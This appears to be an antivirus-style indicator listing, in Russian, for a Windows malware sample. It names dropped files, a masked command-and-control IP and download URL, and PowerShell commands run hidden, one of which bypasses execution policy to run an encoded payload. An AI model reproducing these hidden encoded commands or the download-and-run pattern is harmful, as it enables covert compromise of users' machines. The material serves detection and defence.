Техническая информация
- %WINDIR%\tasks\bruno.wav
- %TEMP%\bruno.png
- '17#.#28.23.141':80
- http://17#.#28.23.141/10101/bruno.png?us#######################
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden (new-object media.soundplayer '%WINDIR%\Tasks\bruno.wav').PlaySync()
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -ep bypass -enc JABhAD0AWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQBzACgAKQA7AEYAbwByAGUAYQBjAGgAKAAkAGIAIABpAG4AIAAkAGEAKQAgAHsAaQBmACAAKAAkAGIALgBOAGEAbQBlACAALQBsAGk...